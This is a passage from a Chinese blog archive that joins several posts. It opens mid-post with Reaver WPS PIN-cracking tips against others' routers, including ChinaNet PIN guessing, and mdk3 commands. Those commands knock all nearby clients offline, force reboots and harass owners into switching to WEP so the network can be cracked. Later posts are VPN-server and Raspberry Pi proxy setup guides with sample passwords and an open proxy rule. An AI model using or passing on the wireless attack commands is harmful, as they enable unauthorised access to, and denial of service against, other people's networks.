,这是说多久没有收到无线路由的回馈算PIN失败。改大一点可以弥补信号冲突、衰减造成的延迟大的问题。-x 360 ,当同PIN10次失败后,reaver就进入休眠,时间10分钟,这样可以让路由器恢复一下,利于我们继续PIN!!这样一来,就不再提示错误了,偶尔也会有一两个,但是因为可以重试所以准确率提高。d reaver的时候总是要从开始,有没有捷径可以走?当然有捷径,只是不是十分靠谱,在进行动作前 ,查阅&&针对你要探测的MAC进行查询,可以使用MAC前半部查询,得到一个近似值,然后你就使用前面提到的临时命令看看是否会直接就到90%,如果是,表示前4位是正确的。然后,修改wpc文件,第一行为 那四位,第三行为1 。然后享受飞跃的感觉。如果你要破解的时中国电信 ChinaNet-xxYn的路由器,可以从网上下载一个 “中国电信路由光猫PIN计算”的excel文档,里面也可能极不靠谱的粗略计算一下前四位。虽然极不靠谱,但是在我的尝试中还不错。到此为止,我们的WPS探测就告一段落。接下来要说的是,没有开放WPS的路由怎么办?4 WPA /WPA 2 加密的路由这个只能跑包解决,也就是说,我们只能探测握手包,就是密码认证的握手包。我会抽时间补全。附记:mdk3攻击我不想将这个写太详细,因为危害极大,但是技术始终是中立,看用的人如何。mdk3攻击的目的1 迫使路由死机,人为重启路由器。这多半是因为我们探测是路由被探测死掉,拒绝我们的探测,需要让人重启,但是路由又不归我们控制,这时mdk3就让路由下线,那么人就不得不重启路由。亲测90%情况下有效2 迫使对方更换密码加密方式对方路由使用了 wpa/wpa2 加密,没有Wps,跑包又无效,怎么办,我们就使用mdk3进行攻击,迫使对方客户端全部掉线,直到更换为wep加密方式,可以秒破。你肯定会问成功概率,我能说的就是,概率比较低,主要原因是,操作路由的人发现wpa无法认证通常都是重启路由了,因此你需要有耐心的让raspberry 24小时不断骚扰,过一周后就可能对方变更了,我只成功过一次。这是在跑包无奈下的选择。3 假造很多假的SSID这种就是无线骚扰,要说有啥用途,第一就是让人家不得安生,那么多ID塞满周边,无从选择,因为ID都差不多。第二,就是人家会选错,使用正确的密码认证。我没有这么用过。列绝了以上3个作用,下面就是实践:下载&安装:修改Makefile将&LINKFLAGS = -lpthread修改为&LINKFLAGS = -pthread (去掉l )make && sudo make install&1&mdk3 mon0 a -a 路由器MAC & & #迫使主人重启路由2 mdk3 mon0 g -t BSSID(例如ChinaNet-Hj4q,也即是wifi的名字) & & & & & & & #此命令将会迫使路由器的WPA假死,直到主人更换为WEP。 !!!!危害极大3 假SSID,这个我不说了4 mdk3 mon0 d -b 文件名(文件名称中包含要攻击的MAC)-s 数字(发包速度) & & & #此命令将会令AP的客户端全下线。用途是在你抓取wpa认证握手包时,强制他们重新认证。 !!!!危害超级大,如果使用不当会导致周围所有无线客户端都掉线!!!!!!!Source: 使用StrongSwan搭建 IKEv1 IKEv2 VPN服务器Published: May 05,
2013 | 21:04 # 决定将本文作废,因我要另再写新版本的配置。这篇作于 2013年,而strongswan已经更新很多版本。#本文需要有独立的VPS,如果你需要一台速度快,每月30元的左右的VPS,可以使用我的邀请注册&/?ref=6813064 并且在注册时使用 SSDVPS 可以送 $20(或者 $10 不等)。一定要选日本线路,这个到国内延迟约40ms ~ 100ms ,一般是 80ms 左右,非常快非常稳定,一个月32元,可以和几个人合租了。#LOG: 对ipsec.conf进行修改,增加了android手机的兼容,现在可以支持完整支持android 自带的VPN设置啦~~~~#LOG: 对ipsec.conf进行修改,加入清楚DPD代码,防止IP 地址池不正确占用#LOG:
删除ipsec.conf 中多余的conn iOS一节,这本是我一年前调试用的,时间不起作用; 删除了 %default中的 rightsubnet ,如果不删除,在定义了多段IP路由的情况下会导致账号无法上网(只有一段IP没这个bug),感谢&#LOG
修正bug,原配置文件会导致一个ID不可以同时多次登陆。得蒙&& 指点,对&strongswan.conf 加入duplicheck.enable = no
,对 ipsec.conf 加如 uniqueids=never#完成度100%在我们生活的周围,通常要用到很多种VPN: PPTP, L2TP/IPSec, Cisco IPSec, IKEv2, 这些不同类型的VPN覆盖了目前我们常见的所有手机或者电脑平台,比如 iOS, Blackberry OS, BB10, Android, WebOS, Windows XP, Windows Vista/7/8, Unix/Unix-like。(*如果你正在找blackberry 翻墙方法、ios ipsec vpn、windows IKEv2 VPN、Blackberry BB10 / Z10 VPN、android VPN,建议放弃本文,这里不是现成的VPN工具而是服务器搭建过程,也就是读了本文你可以初步具备出售VPN的能力)环境:Debian 6.0 ( 64bit), StrongSwan 5.0.4, FreeRadius 2.2.10, Mysql , pppd 2.4.5 , pptpd v1.3.4,daloRadius,Apache 。 目标:
1 使用 FreeRadius作为用户认证和计费
2 使用daloRadius来管理用户,包括账单、到期时间、登录状态
3 StrongSwan 承载IPSec加密,实现 Cisco IPSec, IKEv2综合vpn接入服务
重要说明: IKEv2是非常优秀的vpn,它与Cisco IPSec 完全不同,而且支持Mobile IP 技术,已经是我日常最多使用的VPN。下面的配置同时实现了两者(cisco ipsec 和 ikev2),如果你不用不到,就在阅读下面的文章时忽略掉。
正题阶段一 安装所需要的软件一般的教程,都是安装了一个软件紧接着就将此软件的配置写一下,我就不这么做了,直接将需要的软件都安装完成,最后再写每一样的配置。1 StrongSwan尽管你可以用 apt-get install 来安装,但是那已经是旧版本,根本就不能满足我们的目标,请自行下载&http://www.strongswan.org/download.html ,我当前使用的是 5.0.2 ,解压缩,然后开始安装cd&strongswan-5.0.4Debian Linux下apt-get install libssl-dev./configure &--enable-eap-identity &--enable-eap-mschapv2 &--enable-eap-tls &--enable-eap-dynamic &--enable-eap-radius & --enable-xauth-eap & --enable-xauth-pam & &--enable-dhcp & &--enable-openssl &--enable-unity & --enable-certexpire --enable-tools &--disable-gmp &--enable-coupling &--enable-ipseckey注意:FreeBSD下需要变更为: ./configure --enable-kernel-pfkey --enable-kernel-pfroute --disable-kernel-netlink \
--enable-tools --enable-scripts --with-group=wheel --enable-eap-identity \ --enable-eap-md5 --enable-eap-mschapv2 --enable-eap-radius --enable-xauth-eap \ --enable-openssl --enable-radattr --enable-unity --disable-gmp
--enable-pem make
make install
注意的是,以上的配置参数你可以任意增减唯独红色字体务必保留,这决定了我们后面的所有配置能否畅通。2 安装FreeRadius,pptpd,pppd,mysql-server这些全部通过apt-get 进行安装就可以了FreeBSD 下通过 pkg_add -r 也可以安装好3 daloradius*daloradius非必选,你也可以使用其他管理器,例如 Freeradius ARA (地址&&其实我更推荐这个玩意,简单好用)在这里下载&http://sourceforge.net/projects/daloradius/ ,不过这个是网页客户端,因此你需要安装 Apache或者Nginx ,直接apt-get install就可以。将daloRadius解压缩放在网站根目录下(其实位置你可以自己定义,这个不是难点),比如我的就是放在 /radius下面。OK,第一阶段工作完毕,接下来我们就一步一步来配置我们的服务器阶段二 配置服务器1 配置 StrongSwan ,使得服务器使用Radius 认证计费1.1 下面是我的 strongswan.conf,请务必删除其中的中文注释。 root@v4:/usr/home/bao3 # cat /usr/local/etc/strongswan.conf
# strongswan.conf - strongSwan configuration file
i_dont_care_about_security_and_use_aggressive_mode_psk = yes&#上面这一行相当重要,并且只对 strongswan5.0.1以后的版本有效,没有它的话很多系统使用 ike将不支持aggrisive模式
install_virtual_ip = yes
duplicheck.enable = no#上面这行很重要,否则一个ID只能同时一个在线
#interfaces_use = em0
#如果你的系统无法工作,请取消注释,并且手动指定端口,但一般不必如此
# number of worker threads in charon
threads = 16
dns1=208.67.222.222
dns2=8.8.8.8
# send strongswan vendor ID?
# send_vendor_id = yes
# loglevel to log into sql database
loglevel = -1
# URI to the database
# database = sqlite:///path/to/file.db
# database = mysql://user:password@localhost/database
eap-radius {
#eap_start = yes
accounting = yes
address = radius.youname.org #这里用以指定Radius服务器,如果你的FreeRadius跟strongswan在同一台,你可以使用 localhost或者127.0.0.1 #这里使用了 servers {} ,你可以指定多个Radius,例如 primary,2nd,last1,这里我只使用一个,随意起了个名字:primary
secret = testing123
auth_port = 1812
acct_port = 1813
xauth-eap {
#这一行比较重要,未来要用在ike v1 ,也就是目前大多系统使用的cisco ipsec模式
backend = radius
# Two defined file loggers. Each subsection is either a file
# in the filesystem or one of: stdout, stderr.
/var/log/charon.log {
# add a timestamp prefix
time_format = %b %e %T
# loggers to files also accept the append option to open files in
# append mode at startup (default is yes)
append = no
# the default loglevel for all daemon subsystems (defaults to 1).
default = 3
# flush each line to disk
flush_line = yes
# more detailed loglevel for a specific subsystem, overriding the
# default loglevel.
# prepend connection name, simplifies grepping
ike_name = yes
# And two loggers using syslog. The subsections define the facility to log
# to, currently one of: daemon, auth.
# optional identifier used with openlog(3), prepended to each log message
# by syslog. if not configured, openlog(3) is not called, so the value will
# depend on system defaults (usually the program name)
identifier = charon-custom
# default level to the LOG_DAEMON facility
# very minimalistic IKE auditing logs to LOG_AUTHPRIV
default = 0
libstrongswan {
# set to no, the DH exponent size is optimized
# dh_exponent_ansi_x9_42 = no
1.2 配置ipsec.conf,建立Cisco IPSec和IKEv2以下是我的ipsec.conf,你可以依据你的需要来更改IP地址池,本例中我的客户端拨VPN后得到的IP地址是 192.168.99.128/25 的范围。同样请务必删除其中的中文注释(抱歉,为了让大多数人能读懂并且操作实践,因此使用了中文)。 root@v4:/usr/home/bao3 # cat /usr/local/etc/ipsec.conf
config setup
uniqueids=never
#上面这行很重要,允许一个ID同时多次登陆
conn %default
ikelifetime=60m
keylife=20m
rekeymargin=3m
keyingtries=1
keyexchange=ike
leftsubnet=0.0.0.0/0
right=%any
rightsourceip=192.168.99.128/25
dpdaction=clear
dpddelay=300s
dpdtimeout=1h conn IPSec-IKEv2
keyexchange=ikev2
leftauth=pubkey
leftcert=serverCert.pem
rightauth=eap-radius
rightsendcert=never
eap_identity=%identity
compress=yes
conn CiscoIPSec
keyexchange=ikev1
aggressive=yes
compress=yes
ike=aes256-sha1-modp1024!
esp=aes256-sha1!
dpdaction=clear
leftid=blackberry#上面这个leftid对应的就是cisoc ipsec设定里面的group name,也有一些客户端里面叫IPSec ID,都一样#至于Group Password(也叫IPSE secret)会在另外的文件里配置,这里不着急
type=tunnel
xauth=server
leftauth=psk
rightauth=psk
rightauth2=xauth-eap
leftfirewall=yes
conn android_xauth_psk
keyexchange=ikev1
left=%defaultroute
leftauth=psk
leftsubnet=0.0.0.0/0
right=%any
rightauth=psk
rightauth2=xauth
auto=add以上是IPSec的启动文件,光有这些还不行,上面只是规定了IKE交换阶段的算法和加密,我们需要指定PSK1.3 IPSec Secret (即PSK) root@v4:/usr/home/bao3 # cat /usr/local/etc/ipsec.secrets
%any %any : PSK "heibang"
#注意哦, %any %any 这个格式很多网上的资料都是写成 yourIP %any ,这表示对所有与你IP(yourIP)进行通讯都使用后面的 heibang 进行PSK加密,但是我有多台VPS,在复制配置文件的时候总是需要指定yourIP为我的每一台VPS的实际IP(XX.XXX.XXX.XX)。于是突然有一天我突发奇想,换成了 %any %any,这样就适用于我的任何VPS系统了。。。。。如果你遇到问题,请你将第一个%any 改成你自己的IP。1.4 调试StrongSwan
ipsec start --nofork
这时候你可以看到strongswan 在前台运行,并且出现很多字符,你可以根据这些字符找到问题来进行排查。由于目前还没有配置FreeRadius,所以还不能进行正常的认证,下一步我们就着手解决这个问题2 配置FreeRadius2和mysql-server2.1 mysql-server的配置我不能写太多关于mysql的部分,因此安装以及正常运行需要你参考其他mysql的文章进行,我只写关于FreeRadius的部分 cd /etc/freeradius/sql/mysql
#FreeBSD: cd /usr/local/etc/raddb/sql/mysql
mysqladmin -uroot -p create radius
mysql -uroot -p
mysql&GRANT ALL ON radius.* TO 'radius'@'localhost' IDENTIFIED BY 'radpass';
mysql&FLUSH PRIVILEGES;
mysql&quit
#下面创建FreeRadius的数据库表单
mysql -uroot -p radius &schema.sql
mysql -uroot -p radius &nas.sql
mysql -uroot -p radius &cui.sql
mysql -uroot -p radius &ippool.sql
2.2 更改FreeRadius,使得可以连接Mysql Servercd /etc/freeradius/ #FreeBSD: cd /usr/local/etc/raddb/vi sql.conf server = "localhost"
login = "radius"
password = "radpass"
radius_db = "radius"
readclients = yes
接下来告诉FreeRadius启用sql sed -ie 's/^[ \t]#\$INCLUDE sql.conf$/\$INCLUDE sql.conf/' radiusd.conf
sed -ie 's/^#[ \t]sql$/sql/' sites-available/default
sed这两句的意思就是查找radiusd.conf和 default文件,把注释掉的sql行取消注释,也就是启用sql#FreeBSD用户注意哟,FreeBSD下的sed不是Linux下的GNU Sed,因此有些指令不同,需要自己调整,或者你直接就 vi 编辑吧2.3 配置freeradius对IKEv2进行认证IKEv2使用MSCHAPv2进行加密,但是默认FreeRadius使用md5,因此我们要修改一下: cat eap.conf
default_eap_type = mschapv2
#上面一行省略号代表其他配置不改变,仅更改default
3 调试FreeRadius和Mysql Server我们手动创建一个用户 vpntest,密码 vpntest mysql -uroot -p
mysql& INSERT INTO radcheck (UserName, Attribute, Value) VALUES ('vpntest', 'Password', 'vpntest');
mysql& FLUSH PRIVILEGES;
mysql& quit
然后停止FreeRadius Demon,并使用debug模式freeradius -Xx如果成功了,应该看到如下信息: Listening on authentication address * port 1812
Listening on accounting address * port 1813
Ready to process requests.
如果没有出现,请根据debug信息找到问题,多数情况是由于无法连接mysql server造成,接下来 radtest vpntest vpntest localhost 1812 testing123
Sending Access-Request of id 226 to 127.0.0.1 port 1812
User-Name = "vpntest"
User-Password = "vpntest"
NAS-IP-Address = 127.0.1.1
NAS-Port = 1812
rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=226, length=20
至此为止,服务器环境就已经搭建好了,接下来是细微调整。4 NAT和防火墙设定这个每个系统都不一样,iptables在不同Linux上也不相同,所以你需要自己去设定一下,我这里就不赘述。你需要将 192.168.99.128/25加入NAT你需要放通 UDP 500 和 UDP 4500 端口你需要指定 ESP 同行个别系统下,你需要放通 tun0 的通讯你需要更改 /etc/sysctl.conf :&net.inet.ip.forwarding=15 联调请打开两个 ssh 窗口,分别输入 ipsec start --nofork
和 freeradius -Xx
然后使用客户端进行连接,黑莓 os 4/5/6/7上设定如下: 名称:IPSecVPN
网关类型: Cisco 安全 PIX VPN (或者 Cisco ASA)
集中器地址: 你的服务器IP或者域名
组名: blackberry
组密码: heibang
用户名: bao3
用户密码:bugaosuni
保存密码短语: 勾选
启用扩展身份验证:勾选
动态DNS:勾选
IKE DH组:第2组
IKE 密钥:AES(256)
IKE无用数据:HMAC SHA1(160位)
完全正向保密:不勾选!!!!!(重要)
IPSec加密和无用数据组: AES256-SHA1
使用硬件令牌:不勾选!!!!(重要)
然后设定你的wifi 配置文件,里面的vpn指定为我们刚刚创建的。在iOS上的配置: 通用-&找到VPN项并进入-&添加VPN配置
iOS有L2TP / PPTP / IPSec,选择 IPSec
描述: IPSec VPN
服务器: 你的IP或者域名
账户:bao3
密码:你的密码
RSA / 使用证书 : 不要打开!!!
群组名称: blackberry
密钥: heibang
Windows 设置:可以下载盗版的cisco vpn &client,也可以使用免费的shrew vpn client拨号测试一下,主要观察刚刚让你打开的SSH上面的出错信息,最后一一解决掉。OK,到目前为止,IPSec VPN就完成了6 &IKEv2 的配置原本预计5月7日完成,不过这几天被General Master约谈了,加上我夜里也要调整服务器,就耽搁了。今天是5月8日,IKEv2,开始。其实在我的 ipsec.conf 里已经包含了“conn IPSec-IKEv2&” ,那里面已经规定了通讯方式,分配IP,我们现在要做的是生成IKEv2的证书,导入windows 8/blackberry playbook /bb10 中去使用。6.1 生成服务器证书----Ca,Server两种证书提示:& & 1 我的IKEv2配置是客户端使用根证书+用户名密码的方式上网,如果你在寻找完全使用证书认证上网的方式就无需向下阅读。& & 2 经twitter朋友指正,你使用startssl 的根证书也是一样的,无需自己生成,所以你可以跳过下面这一段。&ipsec pki --gen --outform pem & caKey.pemipsec pki --self --in caKey.pem --dn "C=CN, O=heibang, CN=vpn.youname.org" --ca --outform pem & caCert.pem
ipsec pki --pub --in serverKey.pem | ipsec pki --issue --cacert caCert.pem --cakey caKey.pem \
--dn "C=CN, O=heibang, CN=vpn.youname.org" --flag serverAuth --outform pem & serverCert.pem
重要:上面的高亮字体是提示你,务必要写你的真实域名,也就是客户要连接你的vpn服务器的真实地址。如果你vpn服务器是,但是你这里写成了 ,客户机是不能使用vpn的。以上两条命令可以生成四个文件:caCert.pem, caKey.pem, serverCert.pem serverKey.pem。6.2 启用证书需要将其中三个导入StrongSwan 的配置目录,也就是ipsec.d,默认情况下应该是这样: mv -f caCert.pem /usr/local/etc/ipsec.d/cacerts/
mv -f serverCert.pem /usr/local/etc/ipsec.d/certs
mv -f serverKey.pem /usr/local/etc/ipsec.d/private/
而后: ipsec stop && ipsec start --nofork
你应当可以看到: 08[CFG] received stroke: add connection 'IPSec-IKEv2'
08[CFG] left nor right host is our side, assuming left=local
08[CFG] adding virtual IP address pool 192.168.99.128/24
loaded certificate "C=CN, O=heibang, CN=vpn.youname.org" from 'serverCert.pem'
id '%any' not confirmed by certificate, defaulting to 'C=CN, O=heibang, CN=vpn.youname.org'
08[CFG] added configuration 'IPSec-IKEv2'
已经起作用了,但是不要着急,这样的话你会无法登陆,会出现"[IKE] no private key found for XXXXXXXX",因为我们少做了一步: vi /usr/local/etc/ipsec.secret
: RSA serverKey.pem
6.3 windows 8 使用IKEv26.3.1 电脑中导入证书经过以上两步,服务器上的IKEv2是已经搭建好了,接下来就是让windows来创建连接了:1) 使用管理权限运行 mmc,我是直接win+R 然后输入mmc 。2) 出现控制台,此时空白,点击“文件”、“添加或者删除”3)在左侧找到“证书”二字,点击中间的“添加”,会弹出新的对话窗,点选“本地计算机账户”点击确定,这一点很重要4)在左侧鼠标右键点选“受信任的根证书颁发机构”,弹出菜单中选择“所有任务”-〉“导入”5)将刚刚我们制作好的 caCert.pem 导入6.3.2 创建连接并拨号1)创建新连接,选择“连接工作场区(VPN)”,点下一步2)这个画面因人而异,看本文能看到这里自然知道如何处理3)直到让你输入internet地址和连接名称,这里一定要输入你在生成证书时写在证书里的域名,或者不填写保留空白(windows会根据你的证书自动补上)4 直接保存,然后就可以拨号了阶段三 VPN账户管理1 搭建服务器运行环境恭喜你,来到了这个阶段,虽然很痛苦,不过到了这里,也就意味着这篇教程要终止了。只是这个终止的过程同样很曲折。我选用了流行的 DaloRadius + Nginx 作为管理平台,我也有apache的,只是觉得应该为自己以后留点东西。FreeBSD系统下编译nginx如下:(其他系统跳过这段) ./configure --with-poll_module --with-http_ssl_module --with-http_spdy_module \
--with-http_realip_module --with-http_addition_module \
--with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module \
--with-http_secure_link_module --with-http_stub_status_module --with-http_perl_module --without-mail_pop3_module \
--without-mail_imap_module --without-mail_smtp_module \
--prefix=/usr/local/nginx --sbin-path=/usr/local/sbin/nginx --conf-path=/usr/local/etc/nginx/nginx.conf \
--error-log-path=/var/log/nginx/error.log --pid-path=/var/run/nginx.pid --http-log-path=/var/log/nginx/access.log
你需要使用fcgi模式来跑php,这里不多说了2 配置DaloRadius下载DaloRadius,任意放一个位置,然后使用ln -s daloradius /usr/local/nginx/html/adminchown -R www:www /usr/local/nginx/html/admin这样就可以短网址访问,最重要的是配置daloradiuscd /usr/local/nginx/html/adminvi library/daloradius.conf.php $configValues['CONFIG_DB_HOST'] = 'localhost';
$configValues['CONFIG_DB_PORT'] = '3306';
$configValues['CONFIG_DB_USER'] = 'radius';
$configValues['CONFIG_DB_PASS'] = 'radpass';
$configValues['CONFIG_DB_NAME'] = 'radius';
$configValues['CONFIG_PATH_RADIUS_DICT'] = '/usr/local/etc/raddb/dictionary';
$configValues['CONFIG_PATH_DALO_VARIABLE_DATA'] = '/var/log/daloradius/var';
$configValues['CONFIG_LOG_FILE'] = '/tmp/daloradius.log';
以上几行是需要注意的,要改成你实际的东西才可以。接下来要倒入daloradius自己的数据库表格: cd contrib/db/
mysql -uroot -p radius & fr2-mysql-daloradius-and-freeradius.sql
3 登录使用daloradius如果你就这么打开浏览器登录dalradius,可能会得到 error 500,这是因为你的php缺少组件"DB",使用pear 安装就可以。 PHP Warning: include_once(DB.php): failed to open stream: No such file or directory
pear install db
登录的用户名密码默认是 administrator和radius。进入后就可以添加用户了。4 数据同步也许你不止一台vps,你可能5台、2台,那么我们可能需要对数据库做热备份,万一其中一台有问题还可以切换到另一台,同时freeradius承担认证服务,也需要冗余备份。4.1 mysql的同步很简单,修改my.cnf,你需要将一台服务器作为master,其余的都是slave,这样当master的数据有变更就会分发到slave上,完成了同步master 设定: server-id
= /var/log/mysql/mysql-bin.log
expire_logs_days
max_binlog_size
binlog_do_db
slave &设定: server-id
replicate-do-db
key_buffer
max_allowed_packet
thread_stack
thread_cache_size
myisam-recover
然后在master上创建一个账户(例如backup),账户需要对radius有权限。并且在slave上进入mysql& ,输入 就可以了。freeradius就只靠dns来达到冗余。++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++||终于写好了||______________________________________________________________Source: Raspberry Pi APN 搭建暨Cisco IPSec VPN的使用Published: January 28,
2013 | 13:28 [前言]写这篇的目的仅仅是出于日常需要,它会用到很多技术方面的东西,我力图使这一章变得简单易读。这一篇博客将是一篇综合性的,教你设置路由器映射、DDNS、IPSec VPN、Squid、git。我将会按照我自己安装的顺序来写,特殊部分会有{注*:}。[连接Cisco IPSec VPN]由于近来国内对OpenVPN和PPTP VPN的干扰严重,往往会引发封杀服务器IP,因此现在很多都发放IKEv2 VPN或者Cisco IPSec VPN,这里介绍使用Cisco IPSec VPN,我们使用的软件是 vpnc 。Raspberry Pi 安装的是官方 Raspbian 的系统,在此处下载的&&,其他版本的系统大同小异。在使用Raspberry Pi 安装vpnc前(事实上也包括所有vpn程序),请确保你是用网线连接网络,因为如果你的Raspi使用的是WIFI,那么连接VPN时会断网,这似乎是一个BUG[[安装vpnc]]sudo apt-get install vpnc[[配置vpnc]]默认的vpnc 的配置文件存放在 /etc/vpnc/default.conf (注权限为 0600 ,因此会提示权限问题;Linux开发者不知道为何习惯很差,总是把文件放到/etc/,而实际上应该放入/usr/local/etc ,唉,屌丝就是屌丝),我们需要修改一下,default.conf如下:IPSec gateway 111.222.111.223IPSec ID blackberryIPSec secret heibang#IKE Authmode hybridXauth username testXauth password &123(如果你对Linux/Unix的文本编辑不是很熟悉,那么就使用nano命令,这个如同win下的记事本,sudo nano /etc/vpnc/default.conf &编辑完后,使用Ctrl+x 进行保存,接着问你yes 还是no 是否保存,就选Y)以上配置是“黑帮合租”的配置,你需要改成你相应的配置,其中IPSec ID 和IPSec secret 就是对应你的[Group ID 和Group secret ,然后注释掉 IKE Auth。[[启动vpnc]]sudo vpncConnect Banner:| ====================| # Blackberry VPN #| # powered By @bao3 #| # JAILBREAK GFW #| # TOUCH WORLD #| ====================|&|VPNC started in background (pid: 15807)...[[检验vpn是否成功]]ip route showdefault dev tun0 scope link&10.0.12.0/24 dev tun0 scope link&192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.200&111.222.111.223 via 192.168.1.1 dev eth0 src 192.168.1.200注意看 tun0 一般就是vpn拨号之后的接口,我们看到这里我的vpn服务器给我Raspi分配的IP时 10.0.12.0/24这一段的,然后直接ping& (199.59.148.10) 56(84) bytes of data.64 bytes from r-199-59-148- (199.59.148.10): icmp_req=1 ttl=57 time=313 ms64 bytes from r-199-59-148- (199.59.148.10): icmp_req=2 ttl=57 time=339 ms64 bytes from r-199-59-148- (199.59.148.10): icmp_req=3 ttl=57 time=340 ms64 bytes from r-199-59-148- (199.59.148.10): icmp_req=4 ttl=57 time=349 msOK啦,这样我们的Raspi 就可以连接世界了,但是这样还不够,因为如果网络质量不好会造成vpnc断线,我们还需要一个程序来监控vpnc,断线时可以自动连接,这个程序就是vpncwatch。[[自动监测vpnc]]你可以到&&下载 &&&也可以使用git 来同步源代码下载&sudo apt-get install gitgit clone&git:///dcantrell/vpncwatch.gitcd vpncwatch如果你对自己有信心,就修改 vpncwatch.c 中" 3600 " 为 " 10 " ,也就是原本程序是要1小时才监测一次vpn是否断线,我们需要改成 10s 就监测一次。但是你不改也没有关系,你其实可以手动指定时间,下面会提到,我比较懒所以才修改 o(∩_∩)omake目录下会生成 vpncwatch 这个二进制可执行文件,你可以在当前目录下测试一下:./vpncwatchvpncwatch-1.8Usage: vpncwatch [options] &vpnc executable& &vpnc args&Options:-c HOST Hostname or IP address on the VPN to check periodically forconnectivity. If the test fails, vpnc will be restarted.-p PORT TCP port number to test on HOST.-i SECS Interval in seconds between VPN host check (default: 3600).-? Show this screen.-V Show version.Examples:vpncwatch vpnc /etc/vpnc/vpnc.confvpncwatch /usr/etc/vpnc --gateway 1.2.3.4 --id IDvpncwatch -c intranet. -p 80 vpnc /etc/vpnc/vpnc.confSee the man page for vpnc(8) for more information. Please note thatthe vpnc executable and vpnc argument list need be at the end of thevpncwatch command line.pi@bao3-raspi ~/git/vpncwatch $接下来我们就使用这个文件来监控vpnc,注意vpncwatch本身就可以启动vpnc,所以你可以不用自己来手动启动vpnc了。sudo cp ./vpncwatch /usr/local/binsudo vpncwatch - -i 10 vpnc&解释:1 复制vpncwatch 到系统路径,相当于安装啦~2 启动vpncwatch ,需要root权限,因此使用 sudo 。后面的 - 意思就是说测试作为vpn通断的依据; 而 -i 10 则是测试间隔,设定为10s ,如果你前面自己修改过代码,则这可以省略,其他情况还是继续这样指定的好。到此为止,Raspi连接VPN的部分已经完成了。[搭建APN (HTTP)代理]事实上经过上面的操作,整个Raspi就实时与世界连通了,我们所要做的就是打开Raspi面向国内的通道,方便我们的手持、桌面系统调用,之所以称为APN是因为起初有这个设想是设定到手机 3G APN 那里,其实你可以应用在任何支持代理的环境里。[[APN软件选取]]软件可以自己自由选择,例如:Squid ---- 超级强大的代理缓存服务器软件,目前可以选择squid 2.7或者squid 3,基本功能相仿,对个人来说没有差异;3Proxy ,小巧的代理服务器软件足以应对个人需求;Ziproxy,看名字就知道带压缩的服务器软件,可以大大的压缩内容(仅限文本图文,多媒体除外),可以用来给手机3g/2g网络使用,这样省流量也显得网络更快速,但是图片质量会下降,需要注意的是,这会少量增加手机耗电量。Privoxy,与以上三者相比属于功能齐全但是又稍显轻量的软件,带有网址过滤和自定义访问规则。我这里选取 Squid3 作为代理,主要是看重它有强大的缓存功能,又可以设定访问IP规则,还可以定义访问网址规则。[[安装squid3]]sudo apt-get install squid3安装完成后squid3自动启动,并且默认监听在 3128端口,可以先验证一下(非必要步骤)netstat -Npl | grep 3128(Not all processes could be identified, non-owned process infowill not be shown, you would have to be root to see it all.)tcp 0 0 0.0.0.0:3128&0.0.0.0:* LISTEN -[[配置squid3]]注*:在此提醒一次,熟练的人可以选用vi,如果对Linux文本编辑不熟悉就使用nano ,上文已经说起过。sudo vi /etc/squid3/squid.conf找到 “http_access deny all"这一行,在它的下方插入一行:http_access allow all保存,然后重启squid3:sudo /etc/init.d/squid3 reload[info]&Reloading Squid HTTP Proxy 3.x configuration files.done.&[[测试squid3]]至此,我们这篇文章的工作已经完成90%啦,请坚持下去!我们就差检核APN服务器的工作情况了。你所要做的事就是在你的设备上写上APN地址和端口进行联网测试,我分别举例来说1 iOS 平台A 使用WIFI测试确保你的iOS 使用WIFI 和Raspi在同一个网络,打开 ”设置“-〉”WIFI",点击你的WIFI ID 右边的小箭头 & ,然后看最底下“HTTP代理”,选择“手动”,然后:服务器 & &你的Raspi IP端口 & & & 3128鉴定 & & &(不开,保持默认)然后打开网页测试一下能不能连接世界B 使用 3g/2g 移动网络请搜索下载“APN设置" (app store 中国区),然后打开软件,点击+号新建一个APN。”APN接入点代码“ & & 请输入你的运营商的接入点,例如联通3g是 3gnet ,移动2g是 cmnet点击底下的一个文本框(由于软件差异,你使用可能与我的有区别),会让你输入代理IP和代理端口。代理服务器IP & &你的Raspi IP代理端口 & & & & & 3128点击保存,回到软件初始页面,找到刚才我们自己定制的APN点击,此时应该会提示你安装新的描述文件,点击”安装“。注*:特别提示,某些情况下你的ios连接cmcc,chinanet等wifi会有问题,你需要删除此”描述文件“,可以在”设置-通用“里找到。接下来就体验一下APN上网吧,在3g/2g的移动网络下,其实使用Ziproxy的确是省流量利器,只是我这里的目的仅仅让你领略一下APN风采,后期的东西你可以自己做。2 windows我想每一个能把这篇文章看到这里的人,都会明白我们的最终目的是什么,所以在windows平台我就不过多描述操作,最简单傻瓜的方式就是打开IE浏览器的代理设置,写上Raspi ip和端口。高阶人士推介使用Chrome+Switchy Sharp。3 Linux..... 不说了4 android我手头只有Note2 android 4.0.4 ,低一点的android有可能没有这些菜单,但是可以自己去google play 下载&&这是相当好用的一个工具,基本设置很简单,我这里不描述了。注*:尽管android 4.0.4可以设置Wifi 代理和3G代理,但是不是全局的,只有程序指定要使用系统代理时才起作用,不过很不幸,大多数的android程序设计者都不指定,因此默认情况下设置了代理也仅仅是系统自带的浏览器可以连接世界。但使用proxydroid后则会方便很多,重要的是它支持PAC文件格式至此,如果你的系统成功透过APN连接了世界,那么祝贺你,已经完成了我们整个的设定。不过目前的设定仅限于室内的家庭环境,但是我们想在公司时也能使用家里的APN,怎么办?最后一节是教你超额完成&&&&[对外开放APN]我家的网络与各位不同,是固定IP地址,当前大多是ADSL或者PPPOE的动态IP,因此这一章的目的是让你可以透过运营商对外开放APN我使用的是TPLink,进入设定页面,找到”转发规则“”虚拟服务器“,然后设定如下:以后你就可以远程用你的公网IP+端口来进行外网访问。你想知道你的外网IP,就在家里用电脑打开 & 看看。但是我们的IP都是动态的,可能今天是 1.1.1.1明天就变成 1.1.1.200了,你可以使用DDNS,这部分我今天暂时不写,因为你能做到这一步,一般都不是普通人,可以具备自我操作能力了。今天是阳历生日,我需要出去happy一下,逛街。。。。下一篇会补上。[APN安全]未完。。。。Source: ThinkPad X201i 安装 Mac OS X Mountain Lion 10.8.2Published: December 15,
